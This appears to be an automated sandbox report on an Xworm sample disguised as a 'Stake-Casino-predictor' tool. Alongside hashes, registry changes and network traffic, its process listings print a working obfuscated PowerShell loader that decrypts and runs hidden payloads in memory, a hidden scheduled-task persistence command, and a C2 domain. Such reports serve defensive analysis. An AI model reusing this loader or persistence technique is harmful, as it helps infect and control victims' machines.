| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3084-10-0x0000028A7EFC0000-0x0000028A7EFE2000-memory.dmp
memory/3084-11-0x00007FF97A030000-0x00007FF97AAF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat
| MD5 | c7489479e3959c074892fab7e3ccb78c |
| SHA1 | fa1491e22997924ca0cf9fcab7be03a2db5c32e8 |
| SHA256 | 232ff2bec97a61d7efe72df1e64e397da5a2091b694930f02db0bdf0dabef9b7 |
| SHA512 | 99732c64853e7d14febdbeee14a3b06480ae485993fc9e487945ab1b55b006666702b96ef607e4bf6267d465a8253a2b3a6553ed0ddfbbb954fab966142d25e2 |
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe
| MD5 | 014f79448a036eefcfb2065dcad0d51c |
| SHA1 | 4ca8959526dc949edac260439b4a59144fbd8162 |
| SHA256 | e4118e2e86859a25ac4bccb4fb6c95a45c07f0bbe44621eb0228ffe40fd016e3 |
| SHA512 | b57603eeb9d0271b8f38d8a735b98decb4ae01b1f2835bc2b9026780d9ec617e3e8d6ba7398528520b5793deda2d675207de44b774be6d077d2952483b766358 |
memory/3084-28-0x00007FF97A030000-0x00007FF97AAF2000-memory.dmp
memory/2808-27-0x0000016DF4CB0000-0x0000016DF4CC0000-memory.dmp
memory/2808-29-0x00007FF97A030000-0x00007FF97AAF2000-memory.dmp
memory/4952-38-0x00000240FBB10000-0x00000240FBB56000-memory.dmp
memory/4952-40-0x00000240FB640000-0x00000240FB648000-memory.dmp
memory/4952-39-0x00000240FB5A0000-0x00000240FB5A8000-memory.dmp
memory/4952-41-0x00000240FB650000-0x00000240FB686000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_682.vbs
| MD5 | 1fa339f97c8834249878daf549bc133f |
| SHA1 | d4ceb8f254131adac84759ede084ff27b749b1f5 |
| SHA256 | a6290aa7c9f1e7c8de6dc38675db2725c97413d38a0ab8de44d33e541fd03628 |
| SHA512 | 27398cec83347f1d2e482c4cec1454ec42a4f28755425984f8c1aee98813cc9ca2f00542e769498b275112729fc57e3e55352674b0a4cb7689ce69ff2d86bfa3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3ec0d76d886b2f4b9f1e3da7ce9e2cd7 |
| SHA1 | 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea |
| SHA256 | 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5 |
| SHA512 | a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6 |
memory/3100-69-0x0000017DE1C00000-0x0000017DE1C12000-memory.dmp
memory/3304-70-0x00000000006F0000-0x000000000071A000-memory.dmp
memory/768-120-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/4472-123-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/2532-122-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/2672-132-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/2032-133-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/1796-131-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/1484-130-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/424-129-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/1888-128-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/3492-127-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/2004-121-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/1416-126-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/1620-125-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/1516-124-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/3304-118-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/2476-119-0x00007FF95AF10000-0x00007FF95AF20000-memory.dmp
memory/2808-168-0x00007FF97A030000-0x00007FF97AAF2000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\render.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\render.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/4332-0-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp
memory/4332-1-0x000001F757C60000-0x000001F757C70000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win11-20240508-en
Max time kernel
92s
Max time network
99s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\render.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\render.exe"
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.11:443 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/4880-0-0x0000015802EF0000-0x0000015802F00000-memory.dmp
memory/4880-1-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-27-22-33-26.etl | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-27-22-33-26.etl | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E1E98B978" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat"
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('cw5mysSxxv94MpTM7jlgblINSn63B+9PWD7Ftom4KIA='); $aes_var.IV=[System.Convert]::FromBase64String('A7eONe+6zc8KLiE3Go1KFA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $iWuVc=New-Object System.IO.MemoryStream(,$param_var); $GLIRy=New-Object System.IO.MemoryStream; $GDSej=New-Object System.IO.Compression.GZipStream($iWuVc, [IO.Compression.CompressionMode]::Decompress); $GDSej.CopyTo($GLIRy); $GDSej.Dispose(); $iWuVc.Dispose(); $GLIRy.Dispose(); $GLIRy.ToArray();}function execute_function($param_var,$param2_var){ $rIVWz=[System.Reflection.Assembly]::Load([byte[]]$param_var); $IjLqc=$rIVWz.EntryPoint; $IjLqc.Invoke($null, $param2_var);}$uTCWP = 'C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.bat';$host.UI.RawUI.WindowTitle = $uTCWP;$sjvpk=[System.IO.File]::ReadAllText($uTCWP).Split([Environment]::NewLine);foreach ($lTTZJ in $sjvpk) { if ($lTTZJ.StartsWith('zfOTCBelgsnnDcnkPdZN')) { $SFdRM=$lTTZJ.Substring(20); break; }}$payloads_var=[string[]]$SFdRM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_686_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_686.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_686.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_686.bat" "
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('cw5mysSxxv94MpTM7jlgblINSn63B+9PWD7Ftom4KIA='); $aes_var.IV=[System.Convert]::FromBase64String('A7eONe+6zc8KLiE3Go1KFA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $iWuVc=New-Object System.IO.MemoryStream(,$param_var); $GLIRy=New-Object System.IO.MemoryStream; $GDSej=New-Object System.IO.Compression.GZipStream($iWuVc, [IO.Compression.CompressionMode]::Decompress); $GDSej.CopyTo($GLIRy); $GDSej.Dispose(); $iWuVc.Dispose(); $GLIRy.Dispose(); $GLIRy.ToArray();}function execute_function($param_var,$param2_var){ $rIVWz=[System.Reflection.Assembly]::Load([byte[]]$param_var); $IjLqc=$rIVWz.EntryPoint; $IjLqc.Invoke($null, $param2_var);}$uTCWP = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_686.bat';$host.UI.RawUI.WindowTitle = $uTCWP;$sjvpk=[System.IO.File]::ReadAllText($uTCWP).Split([Environment]::NewLine);foreach ($lTTZJ in $sjvpk) { if ($lTTZJ.StartsWith('zfOTCBelgsnnDcnkPdZN')) { $SFdRM=$lTTZJ.Substring(20); break; }}$payloads_var=[string[]]$SFdRM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | powershellcmd.theworkpc.com | udp |
| DE | 144.76.71.93:777 | powershellcmd.theworkpc.com | tcp |
| US | 8.8.8.8:53 | 93.71.76.144.in-addr.arpa | udp |
